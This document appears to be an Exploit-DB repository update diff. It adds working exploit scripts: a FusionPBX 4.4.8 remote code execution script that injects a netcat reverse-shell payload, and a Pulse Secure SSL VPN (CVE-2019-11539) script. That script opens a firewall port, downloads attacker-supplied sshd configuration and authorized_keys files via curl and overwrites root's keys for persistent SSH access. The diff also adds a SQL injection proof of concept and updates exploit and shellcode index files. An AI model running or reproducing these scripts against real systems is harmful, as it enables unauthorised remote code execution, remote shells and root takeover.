DB: 2019-09-07

3 changes to exploits/shellcodes

SCO OpenServer 5.0.7 - MMDF deliver Privilege Escalation

Linux Kernel 2.4.x/2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/11 / Ubuntu 8.10) (PPC) - 'sock_sendpage()' Local Privilege Escalation

Linux Kernel 2.4/2.6 (Fedora 11) - 'sock_sendpage()' Local Privilege Escalation (2)

Linux Kernel 2.4/2.6 - 'sock_sendpage()' Local Privilege Escalation (3)

SCO Multi-channel Memorandum Distribution Facility - Multiple Vulnerabilities
Pulse Secure 8.1R15.1/8.2/8.3/9.0 SSL VPN - Remote Code Execution
FusionPBX 4.4.8 - Remote Code Execution

Inventory Webapp - 'itemquery' SQL injection

Linux/x86 - TCP Reverse Shell 127.0.0.1 Nullbyte Free Shellcode
Linux/x86 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Byte Free Shellcode (107 Bytes)

exploits/linux/remote/47358.py

@@ -0,0 +1,83 @@
+#!/usr/bin/python3
+
+'''
+# Exploit Title: FusionPBX v4.4.8 Remote Code Execution
+# Date: 13/08/2019
+# Exploit Author: Askar (@mohammadaskar2)
+# CVE : 2019-15029
+# Vendor Homepage: https://www.fusionpbx.com
+# Software link: https://www.fusionpbx.com/download
+# Version: v4.4.8
+# Tested on: Ubuntu 18.04 / PHP 7.2
+'''
+
+import requests
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+import sys
+import warnings
+from bs4 import BeautifulSoup
+
+# turn off BeautifulSoup and requests warnings
+warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+if len(sys.argv) != 6:
+    print(len(sys.argv))
+    print("[~] Usage : ./FusionPBX-exploit.py url username password ip port")
+    print("[~] ./exploit.py http://example.com admin p@$$word 172.0.1.3 1337")
+
+    exit()
+
+url = sys.argv[1]
+username = sys.argv[2]
+password = sys.argv[3]
+ip = sys.argv[4]
+port = sys.argv[5]
+
+
+request = requests.session()
+
+login_info = {
+    "username": username,
+    "password": password
+}
+
+login_request = request.post(
+    url+"/core/user_settings/user_dashboard.php",
+     login_info, verify=False
+ )
+
+
+if "Invalid Username and/or Password" not in login_request.text:
+    print("[+] Logged in successfully")
+else:
+    print("[+] Error with creds")
+
+service_edit_page = url + "/app/services/service_edit.php"
+services_page = url + "/app/services/services.php"
+payload_info = {
+    # the service name you want to create
+    "service_name":"PwnedService3",
+    "service_type":"pid",
+    "service_data":"1",
+
+    # this value contains the payload , you can change it as you want
+    "service_cmd_start":"rm /tmp/z;mkfifo /tmp/z;cat /tmp/z|/bin/sh -i 2>&1|nc 172.0.1.3 1337 >/tmp/z",
+    "service_cmd_stop":"stop",
+    "service_description":"desc",
+    "submit":"Save"
+}
+
+request.post(service_edit_page, payload_info, verify=False)
+html_page = request.get(services_page, verify=False)
+
+soup = BeautifulSoup(html_page.text, "lxml")
+
+for a in soup.find_all(href=True):
+    if "PwnedService3" in a:
+        sid = a["href"].split("=")[1]
+        break
+
+service_page = url + "/app/services/services.php?id=" + sid + "&a=start"
+print("[+] Triggering the exploit , check your netcat !")
+request.get(service_page, verify=False)

exploits/multiple/remote/47354.py

@@ -0,0 +1,157 @@
+#!/usr/bin/python
+#
+# Exploit Title: Pulse Secure Post-Auth Remote Code Execution
+# Google Dork: inurl:/dana-na/ filetype:cgi
+# Date: 09/05/2019
+# Exploit Author: Justin Wagner (0xDezzy), Alyssa Herrera (@Alyssa_Herrera_)
+# Vendor Homepage: https://pulsesecure.net
+# Version: 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4
+# Tested on: linux
+# CVE : CVE-2019-11539
+#
+# Initial Discovery: Orange Tsai (@orange_8361), Meh Chang (@mehqq_)
+#
+# Exploits CVE-2019-11539 to run commands on the Pulse Secure Connect VPN
+# Downloads Modified SSH configuration and authorized_keys file to allow SSH as root.
+# You will need your own configuration and authorized_keys files.
+#
+# Reference: https://nvd.nist.gov/vuln/detail/CVE-2019-11539
+# Reference: https://blog.orange.tw/2019/09/attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain.html
+#
+# Please Note, Alyssa or myself are not responsible with what is done with this code. Please use this at your own discretion and with proper authrization.
+# We will not bail you out of jail, go to court, etc if you get caught using this maliciously. Be smart and remember, hugs are free.
+#
+# Imports
+import requests
+import urllib
+from bs4 import BeautifulSoup
+
+# Host information
+host = '' # Host to exploit
+login_url = '/dana-na/auth/url_admin/login.cgi' # Login page
+CMDInjectURL = '/dana-admin/diag/diag.cgi' # Overwrites the Template when using tcpdump
+CommandExecURL = '/dana-na/auth/setcookie.cgi' # Executes the code
+
+# Login Credentials
+user = 'admin' # Default Username
+password = 'password' # Default Password
+
+# Necessary for Curl
+downloadHost = '' # IP or FQDN for host running webserver
+port = '' # Port where web service is running. Needs to be a string, hence the quotes.
+
+# Proxy Configuration
+# Uncomment if you need to use a proxy or for debugging requests
+proxies = {
+    # 'http': 'http://127.0.0.1:8080',
+    # 'https': 'http://127.0.0.1:8080',
+}
+
+# Headers for requests
+headers = {
+    'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36',
+    'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
+    'Accept-Language':'en-US,en;q=0.5',
+    'Accept-Encoding':'gzip, deflate',
+    'Content-Type':'application/x-www-form-urlencoded',
+}
+
+# Cookies to send with request
+cookies = {
+    'lastRealm':'Admin%20Users',
+    'DSSIGNIN':'url_admin',
+    'DSSignInURL':'/admin/',
+    'DSPERSISTMSG':'',
+}
+
+# Data for post request
+loginData = {
+    'tz_offset': 0,
+    'username': user,
+    'password': password,
+    'realm': 'Admin Users',
+    'btnSubmit': 'Sign In',
+}
+
+s = requests.Session() # Sets up the session
+s.proxies = proxies # Sets up the proxies
+
+# Disable Warnings from requests library
+requests.packages.urllib3.disable_warnings()
+
+# Administrator Login logic
+# Probably wouldn't have figured this out without help from @buffaloverflow
+def adminLogin():
+    global xsAuth
+    global _headers
+
+    # Send the intial request
+    r = requests.get('https://%s/dana-na/auth/url_admin/welcome.cgi' % host, cookies=cookies, headers=headers, verify=False, proxies=proxies)
+
+    print('[#] Logging in...') # Self Explanatory
+    r = s.post('https://' + host + login_url, data=loginData,verify=False, proxies=proxies, allow_redirects=False) # sends login post request
+    print('[#] Sent Login Request...')
+
+    # Login Logic
+    if r.status_code == 302 and 'welcome.cgi' in r.headers.get("location",""):
+        referer = 'https://%s%s' %(host, r.headers["location"]) # Gets the referer
+        r = s.get(referer, verify=False) # Sends a get request
+        soup = BeautifulSoup(r.text, 'html.parser') # Sets up HTML Parser
+        FormDataStr = soup.find('input', {'id':'DSIDFormDataStr'})["value"] # Gets DSIDFormDataStr
+        print('[#] Grabbing xsauth...')
+        xsAuth = soup.find('input', {'name':'xsauth'})["value"] # Gets the cross site auth token
+        print('[!] Got xsauth: ' + xsAuth) # Self Explanatory
+        data = {'btnContinue':'Continue the session', 'FormDataStr':FormDataStr, 'xsauth':xsAuth} # Submits the continue session page
+        _headers = headers # Sets the headers
+        _headers.update({'referer':referer}) # Updates the headers
+        r = s.post('https://%s' %(host + login_url), data=data, headers=_headers, verify=False, proxies=proxies) #Sends a new post request
+
+    print('[+] Logged in!') # Self Explanatory
+
+# Command injection logic
+def cmdInject(command):
+    r = s.get('https://' + host + CMDInjectURL, verify=False, proxies=proxies)
+    if r.status_code == 200:
+        soup = BeautifulSoup(r.text, 'html.parser') # Sets up HTML Parser
+        xsAuth = soup.find('input', {'name':'xsauth'})["value"] # Gets the cross site auth token
+        payload = {
+            'a':'td',
+            'chkInternal':'On',
+            'optIFInternal':'int0',
+            'pmisc':'on',
+            'filter':'',
+            'options':'-r$x="%s",system$x# 2>/data/runtime/tmp/tt/setcookie.thtml.ttc <' %command,
+            'toggle':'Start+Sniffing',
+            'xsauth':xsAuth
+        }
+        # Takes the generated URL specific to the command then encodes it in hex for the DSLaunchURL cookie
+        DSLaunchURL_cookie = {'DSLaunchURL':(CMDInjectURL+'?a=td&chkInternal=on&optIFInternal=int0&pmisc=on&filter=&options=-r%24x%3D%22'+urllib.quote_plus(command)+'%22%2Csystem%24x%23+2%3E%2Fdata%2Fruntime%2Ftmp%2Ftt%2Fsetcookie.thtml.ttc+%3C&toggle=Start+Sniffing&xsauth='+xsAuth).encode("hex")}
+        # print('[+] Sending Command injection: %s' %command) # Self Explanatory. Useful for seeing what commands are run
+        # Sends the get request to overwrite the template
+        r = s.get('https://' + host + CMDInjectURL+'?a=td&chkInternal=on&optIFInternal=int0&pmisc=on&filter=&options=-r%24x%3D%22'+command+'%22%2Csystem%24x%23+2%3E%2Fdata%2Fruntime%2Ftmp%2Ftt%2Fsetcookie.thtml.ttc+%3C&toggle=Start+Sniffing&xsauth='+xsAuth, cookies=DSLaunchURL_cookie, verify=False, proxies=proxies)
+        # Sends the get request to execute the code
+        r = s.get('https://' + host + CommandExecURL, verify=False)
+
+# Main logic
+if __name__ == '__main__':
+    adminLogin()
+    try:
+        print('[!] Starting Exploit')
+        print('[*] Opening Firewall port...')
+        cmdInject('iptables -A INPUT -p tcp --dport 6667 -j ACCEPT') # Opens SSH port
+        print('[*] Downloading Necessary Files....')
+        cmdInject('/home/bin/curl '+downloadHost+':'+port+'/cloud_sshd_config -o /tmp/cloud_sshd_config') # download cloud_sshd_config
+        cmdInject('/home/bin/curl '+downloadHost+':'+port+'/authorized_keys -o /tmp/authorized_keys') # download authorized_keys
+        print('[*] Backing up Files...')
+        cmdInject('cp /etc/cloud_sshd_config /etc/cloud_sshd_config.bak') # backup cloud_sshd_config
+        cmdInject('cp /.ssh/authorized_keys /.ssh/authorized_keys.bak') # backp authorized_keys
+        print('[*] Overwriting Old Files...')
+        cmdInject('cp /tmp/cloud_sshd_config /etc/cloud_sshd_config') # overwrite cloud_sshd_config
+        cmdInject('cp /tmp/authorized_keys /.ssh/authorized_keys') # overwrite authorized_keys
+        print('[*] Restarting SSHD...')
+        cmdInject('kill -SIGHUP $(pgrep -f "sshd-ive")') # Restart sshd via a SIGHUP
+        print('[!] Done Exploiting the system.')
+        print('[!] Please use the following command:')
+        print('[!] ssh -p6667 root@%s') %(host)
+    except Exception as e:
+        raise

exploits/php/webapps/47356.txt

@@ -0,0 +1,37 @@
+# Exploit Title: Inventory Webapp SQL injection
+# Data: 05.09.2019
+# Exploit Author: mohammad zaheri
+# Vendor HomagePage: https://github.com/edlangley/inventory-webapp
+# Tested on: Windows
+# Google Dork: N/A
+
+
+=========
+Vulnerable Page:
+=========
+/php/add-item.php
+
+
+==========
+Vulnerable Source:
+==========
+Line39: $name = $_GET["name"];
+Line39: $description = $_GET["description"];
+Line39: $quantity = $_GET["quantity"];
+Line39: $cat_id = $_GET["cat_id"];
+Line49: if(mysql_query($itemquery, $conn))
+
+
+
+=========
+POC:
+=========
+http://site.com/php/add-item.php?itemquery=[SQL]
+
+
+
+=========
+Contact Me :
+=========
+Telegram : @m_zhrii
+Email : neoboy503@gmail.com

files_exploits.csv

@@ -6698,7 +6698,7 @@ id,file,description,date,author,type,platform,port
 591,exploits/linux/local/591.c,"Socat 1.4.0.2 - Not SETUID Local Format String",2004-10-23,CoKi,local,linux,
 600,exploits/linux/local/600.c,"GD Graphics Library - Local Heap Overflow",2004-10-26,anonymous,local,linux,
 601,exploits/linux/local/601.c,"libxml 2.6.12 nanoftp - Local Buffer Overflow",2004-10-26,infamous41md,local,linux,
-602,exploits/sco/local/602.c,"SCO OpenServer 5.0.7 - MMDF deliver Privilege Escalation",2004-10-26,"Ramon Valle",local,sco,
+602,exploits/sco/local/602.c,"SCO OpenServer 5.0.7 - MMDF deliver Privilege Escalation",2004-10-26,"Ramon de C Valle",local,sco,
 624,exploits/linux/local/624.c,"Linux Kernel 2.4.27/2.6.8 - 'binfmt_elf' Executable File Read",2004-11-10,"Paul Starzetz",local,linux,
 629,exploits/multiple/local/629.c,"Multiple AntiVirus - '.zip' Detection Bypass",2004-11-14,oc192,local,multiple,
 657,exploits/linux/local/657.c,"atari800 - Local Privilege Escalation",2004-11-25,pi3,local,linux,
@@ -7413,7 +7413,7 @@ id,file,description,date,author,type,platform,port
 9540,exploits/windows/local/9540.py,"HTML Creator & Sender 2.3 build 697 - Local Buffer Overflow (SEH)",2009-08-28,Dr_IDE,local,windows,
 9542,exploits/linux_x86/local/9542.c,"Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' Ring0 Privilege Escalation (1)",2009-08-31,"INetCop Security",local,linux_x86,
 9543,exploits/linux/local/9543.c,"Linux Kernel < 2.6.31-rc7 - 'AF_IRDA' 29-Byte Stack Disclosure (2)",2009-08-31,"Jon Oberheide",local,linux,
-9545,exploits/linux/local/9545.c,"Linux Kernel 2.4.x/2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/11 / Ubuntu 8.10) (PPC) - 'sock_sendpage()' Local Privilege Escalation",2009-08-31,"Ramon Valle",local,linux,
+9545,exploits/linux/local/9545.c,"Linux Kernel 2.4.x/2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/11 / Ubuntu 8.10) (PPC) - 'sock_sendpage()' Local Privilege Escalation",2009-08-31,"Ramon de C Valle",local,linux,
 9548,exploits/windows/local/9548.pl,"Ultimate Player 1.56b - '.m3u' / '.upl' Universal Local Buffer Overflow (SEH)",2009-08-31,hack4love,local,windows,
 9550,exploits/windows/local/9550.txt,"Hex Workshop 4.23/5.1/6.0 - '.hex' Universal Local Buffer Overflow (SEH)",2009-08-31,hack4love,local,windows,
 9551,exploits/windows/local/9551.py,"Media Jukebox 8 - '.pls' Universal Local Buffer (SEH)",2009-08-31,mr_me,local,windows,
@@ -7427,7 +7427,7 @@ id,file,description,date,author,type,platform,port
 9581,exploits/windows/local/9581.pl,"SAP Player 0.9 - '.m3u' Universal Local Buffer Overflow (SEH)",2009-09-03,PLATEN,local,windows,
 9589,exploits/windows/local/9589.pl,"OtsTurntables 1.00.027 - '.m3u' / '.ofl' Universal Local Buffer Overflow (SEH)",2009-09-04,hack4love,local,windows,
 9595,exploits/linux/local/9595.c,"HTMLDOC 1.8.27 - '.html' File Handling Stack Buffer Overflow",2009-09-09,"Pankaj Kohli",local,linux,
-9598,exploits/linux/local/9598.txt,"Linux Kernel 2.4/2.6 (Fedora 11) - 'sock_sendpage()' Local Privilege Escalation (2)",2009-09-09,"Ramon Valle",local,linux,
+9598,exploits/linux/local/9598.txt,"Linux Kernel 2.4/2.6 (Fedora 11) - 'sock_sendpage()' Local Privilege Escalation (2)",2009-09-09,"Ramon de C Valle",local,linux,
 9608,exploits/linux/local/9608.c,"GemStone/S 6.3.1 - 'stoned' Local Buffer Overflow",2009-09-09,"Jeremy Brown",local,linux,
 9610,exploits/windows/local/9610.py,"Audio Lib Player - '.m3u' Local Buffer Overflow (SEH)",2009-09-09,blake,local,windows,
 9618,exploits/windows/local/9618.php,"Millenium MP3 Studio - '.pls' / '.mpf' / '.m3u' Universal Local Buffer Overflow (SEH)",2009-09-09,hack4love,local,windows,
@@ -7435,7 +7435,7 @@ id,file,description,date,author,type,platform,port
 9624,exploits/windows/local/9624.py,"KSP 2009R2 - '.m3u' Universal Local Buffer Overflow (SEH)",2009-09-10,hack4love,local,windows,
 9627,exploits/linux/local/9627.txt,"Enlightenment - Linux Null PTR Dereference Framework",2009-09-10,spender,local,linux,
 9628,exploits/windows/local/9628.pl,"Icarus 2.0 - '.pgn' Universal Local Buffer Overflow (SEH)",2009-09-10,germaya_x,local,windows,
-9641,exploits/linux/local/9641.txt,"Linux Kernel 2.4/2.6 - 'sock_sendpage()' Local Privilege Escalation (3)",2009-09-11,"Ramon Valle",local,linux,
+9641,exploits/linux/local/9641.txt,"Linux Kernel 2.4/2.6 - 'sock_sendpage()' Local Privilege Escalation (3)",2009-09-11,"Ramon de C Valle",local,linux,
 9645,exploits/aix/local/9645.sh,"IBM AIX 5.6/6.1 - '_LIB_INIT_DBG' Arbitrary File Overwrite via Libc Debug",2009-09-11,"Marco Ivaldi",local,aix,
 9655,exploits/windows/local/9655.pl,"Invisible Browsing 5.0.52 - '.ibkey' Local Buffer Overflow",2009-09-14,PLATEN,local,windows,
 9659,exploits/windows/local/9659.cpp,"Portable E.M Magic Morph 1.95b - '.MOR' File Stack Buffer Overflow",2009-09-14,"fl0 fl0w",local,windows,
@@ -9098,7 +9098,7 @@ id,file,description,date,author,type,platform,port
 24258,exploits/windows/local/24258.txt,"Aloaha Credential Provider Monitor 5.0.226 - Local Privilege Escalation",2013-01-20,LiquidWorm,local,windows,
 24277,exploits/windows/local/24277.c,"Microsoft Windows NT 4.0/2000 - POSIX Subsystem Local Buffer Overflow / Local Privilege Escalation (MS04-020)",2004-07-16,bkbll,local,windows,
 24278,exploits/linux/local/24278.sh,"IM-Switch - Insecure Temporary File Handling Symbolic Link",2004-07-13,"SEKINE Tatsuo",local,linux,
-24293,exploits/sco/local/24293.c,"SCO Multi-channel Memorandum Distribution Facility - Multiple Vulnerabilities",2004-07-20,"Ramon Valle",local,sco,
+24293,exploits/sco/local/24293.c,"SCO Multi-channel Memorandum Distribution Facility - Multiple Vulnerabilities",2004-07-20,"Ramon de C Valle",local,sco,
 24335,exploits/unix/local/24335.txt,"Oracle9i Database - Default Library Directory Privilege Escalation",2004-07-30,"Juan Manuel Pascual Escribá",local,unix,
 24366,exploits/windows/local/24366.rb,"Microsoft Windows - Manage Memory Payload Injection (Metasploit)",2013-01-25,Metasploit,local,windows,
 24374,exploits/windows/local/24374.c,"Ipswitch IMail Server 7/8 - Weak Password Encryption",1999-12-20,Adik,local,windows,
@@ -17660,6 +17660,8 @@ id,file,description,date,author,type,platform,port
 47347,exploits/java/remote/47347.rb,"Cisco Data Center Network Manager - Unauthenticated Remote Code Execution (Metasploit)",2019-09-03,Metasploit,remote,java,443
 47348,exploits/hardware/remote/47348.rb,"Cisco RV110W/RV130(W)/RV215W Routers Management Interface - Remote Command Execution (Metasploit)",2019-09-03,Metasploit,remote,hardware,443
 47353,exploits/linux/remote/47353.rb,"AwindInc SNMP Service - Command Injection (Metasploit)",2019-09-05,Metasploit,remote,linux,
+47354,exploits/multiple/remote/47354.py,"Pulse Secure 8.1R15.1/8.2/8.3/9.0 SSL VPN - Remote Code Execution",2019-09-06,"Justin Wagner",remote,multiple,
+47358,exploits/linux/remote/47358.py,"FusionPBX 4.4.8 - Remote Code Execution",2019-09-06,Askar,remote,linux,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -41705,3 +41707,4 @@ id,file,description,date,author,type,platform,port
 47349,exploits/php/webapps/47349.txt,"FileThingie 2.5.7 - Arbitrary File Upload",2019-09-03,cakes,webapps,php,
 47350,exploits/php/webapps/47350.txt,"WordPress Plugin Download Manager 2.9.93 - Cross-Site Scripting",2019-09-04,MgThuraMoeMyint,webapps,php,80
 47351,exploits/hardware/webapps/47351.txt,"DASAN Zhone ZNID GPON 2426A EU - Multiple Cross-Site Scripting",2019-09-04,"Adam Ziaja",webapps,hardware,80
+47356,exploits/php/webapps/47356.txt,"Inventory Webapp - 'itemquery' SQL injection",2019-09-06,"mohammad zaheri",webapps,php,

files_shellcodes.csv

@@ -1000,4 +1000,4 @@ id,file,description,date,author,type,platform
 47291,shellcodes/linux_x86-64/47291.c,"Linux/x86_64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (pass) Shellcode (120 bytes)",2019-08-19,"Gonçalo Ribeiro",shellcode,linux_x86-64
 47292,shellcodes/linux_x86-64/47292.c,"Linux/x86_64 - AVX2 XOR Decoder + execve(_/bin/sh_) Shellcode (62 bytes)",2019-08-19,"Gonçalo Ribeiro",shellcode,linux_x86-64
 47296,shellcodes/linux/47296.c,"Linux/MIPS64 - Reverse (localhost:4444/TCP) Shell Shellcode (157 bytes)",2019-08-20,antonio,shellcode,linux
-47352,shellcodes/linux_x86/47352.c,"Linux/x86 - TCP Reverse Shell 127.0.0.1 Nullbyte Free Shellcode",2019-09-05,guly,shellcode,linux_x86
+47352,shellcodes/linux_x86/47352.c,"Linux/x86 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Byte Free Shellcode (107 Bytes)",2019-09-05,guly,shellcode,linux_x86